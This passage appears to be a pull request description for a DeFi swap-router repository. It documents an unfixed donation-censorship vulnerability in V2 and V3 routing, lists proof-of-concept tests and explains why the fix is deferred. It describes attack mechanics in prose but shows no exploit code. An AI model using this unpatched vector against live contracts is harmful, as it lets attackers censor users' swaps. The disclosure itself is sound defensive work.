- **`V2SwapRouter.sol`**: Add inline `KNOWN ISSUE` comments at the `amountInput` derivation and NatSpec on `v2SwapExactInput` / `v2SwapExactOutput` documenting the donation-censorship vector and why input attribution does not close multihop routes
- **`V3SwapRouter.sol`**: Add inline `KNOWN ISSUE` comment at the `CONTRACT_BALANCE` branch noting the related V3 exposure (donation to the router enlarges the trade; `SWEEP` recovers it)
- **`V2PerHopDonationPoC.t.sol`**: Single-hop PoC — shows the donation strictly improves the victim's output when unbounded, censors the identical swap when bounded, is fully recovered via `skim()`, and that attack cost scales with pool reserves not trade size
- **`V2PerHopDonationMultihop.t.sol`**: Two-hop PoC with hop 0's bound disabled and only hop 1 bounded — route is censored at hop 1 whose own pair was never touched, ruling out input attribution as a fix
- **`MockV2Pair.sol`**: Minimal faithful port of UniswapV2Pair swap/skim/sync/getReserves with a CREATE2 factory matching the `pairFor` derivation scheme
## Why the fix is deferred
- The correct primitive needs routing to emit different per-hop values, so it isn't contained to this repo
- The encoding migration needs a decision first: the field's meaning would change without its type changing, so a stale caller would be silently misread rather than rejected — likely wants new command IDs
- Close to the bytecode limit and want to scope deliberately
## Notes
- A working reference implementation is parked on `fix/v2-hop-bound-from-reserves` (commit `47e3c4c`, not for merge) — replaces the ratio with a reserve-quoted bound, drops 282 bytes of bytecode
- `forge test` — 88 passed, 0 failed (excluding pre-existing Celo fork-test failures on `main`)

</details>
<!-- claude-pr-description-end -->